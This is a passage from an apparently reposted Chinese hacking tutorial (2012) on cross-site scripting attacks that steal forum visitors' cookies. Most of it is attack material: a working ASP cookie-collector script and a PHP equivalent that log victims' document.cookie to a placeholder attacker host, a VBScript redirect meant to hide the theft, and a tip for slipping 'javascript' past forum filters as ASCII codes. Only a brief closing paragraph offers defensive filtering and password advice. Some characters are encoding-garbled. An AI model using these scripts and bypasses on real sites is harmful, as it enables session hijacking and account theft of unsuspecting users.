簡(jiǎn)單分析Script腳本跨站攻擊漏洞技術(shù)
您當(dāng)前位置:首頁(yè) > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)
紅軟基地 推薦
2012-01-19
其中http://xxx.xxx.xxx/是大家自己網(wǎng)站空間,cookies.asp是一個(gè)asp腳本用于收集
msg后邊跟的參數(shù),而參數(shù)我們指定的是document.cookie,也就是訪問(wèn)此貼用戶(hù)的cookie。
cookies.asp的代碼是:
<%
testfile=Server.MapPath("hun.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
這樣所有訪問(wèn)者的cookie都會(huì)收集在hun.txt這個(gè)文件里
但是訪問(wèn)者訪問(wèn)我們的帖子,同樣會(huì)訪問(wèn)到我們的網(wǎng)站的,這樣不是露餡了嗎?呵呵,但只要我們稍做處理
就可以做的相對(duì)真實(shí),比如我們加上下面的代碼
<script language=vbscript>
window.location.href="http://xxx.xxx.xxx"
</script>
這個(gè)xxx.xxx.xxx最好換成你攻擊的網(wǎng)站的域名,這樣做的目的是在他訪問(wèn)我們精心構(gòu)造的網(wǎng)站同時(shí)開(kāi)打他
自己的網(wǎng)站,呵呵,這樣是不是會(huì)更隱蔽一點(diǎn)呢?
這個(gè)cookies.asp和有一個(gè)同樣作用的cookies.php一樣,附代碼如下:
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("cookies.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
?>
但是大部份做的不錯(cuò)的論壇,都過(guò)濾了javascript這些字符。不過(guò)還是有方法可以利用的,
可以在論壇發(fā)的貼里將javascript寫(xiě)成ascii碼。像j可以寫(xiě)成”j”
防范的方法,就是過(guò)濾字符像javascript/<script>/’/;/&/#了等等,
當(dāng)然前提是你的網(wǎng)頁(yè)還要正常顯示。建議大家不要輕易打開(kāi)一些不明url,要將自己的信箱、論壇、QQ等資料的密碼設(shè)的都不一樣,
如果一旦資料或密碼被盜,避免引連鎖反應(yīng),所有資料和密碼都被別人獲得。這就要用到博大精深是社會(huì)工程學(xué)了。
總結(jié)一下吧?缯镜募记尚院軓(qiáng),呵呵大家多積累經(jīng)驗(yàn)用起來(lái)會(huì)達(dá)到事半功倍的效果。
來(lái)源:紅訊頻道